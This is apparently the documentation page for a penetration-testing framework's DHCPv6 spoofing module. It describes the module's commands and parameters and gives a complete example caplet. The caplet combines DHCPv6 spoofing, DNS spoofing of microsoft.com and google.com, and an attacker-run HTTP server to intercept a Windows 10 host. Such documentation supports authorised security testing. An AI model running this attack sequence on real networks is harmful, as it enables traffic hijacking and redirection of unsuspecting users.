dhcp6.spoof
This module’s purpose is attacking Microsoft Windows hosts by replying to DHCPv6 messages and providing the target with a link-local IPv6 address and setting the attacker host as default DNS server (as described here).
Commands
Section titled “Commands”dhcp6.spoof on
Section titled “dhcp6.spoof on”Start the DHCPv6 spoofer in the background.
dhcp6.spoof off
Section titled “dhcp6.spoof off”Stop the DHCPv6 spoofer in the background.
Parameters
Section titled “Parameters”| Parameter | Default | Description |
|---|---|---|
dhcp6.spoof.domains | microsoft.com, goole.com, facebook.com, apple.com, twitter.com | Comma separated values of domain names to spoof. |
Examples
Section titled “Examples”The following is the mitm6.cap caplet performing the full DHCPv6 attack versus a Windows 10 machine which is booting:
# let's spoof Microsoft and Google ^_^set dns.spoof.domains microsoft.com, google.comset dhcp6.spoof.domains microsoft.com, google.com
# every http request to the spoofed hosts will come to us# let's give em some contentsset http.server.path /var/www/something
# serve fileshttp.server on# redirect DNS request by spoofing DHCPv6 packetsdhcp6.spoof on# send spoofed DNS replies ^_^dns.spoof on
# set a custom prompt for ipv6set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}# clear the events buffer and the screenevents.clearclear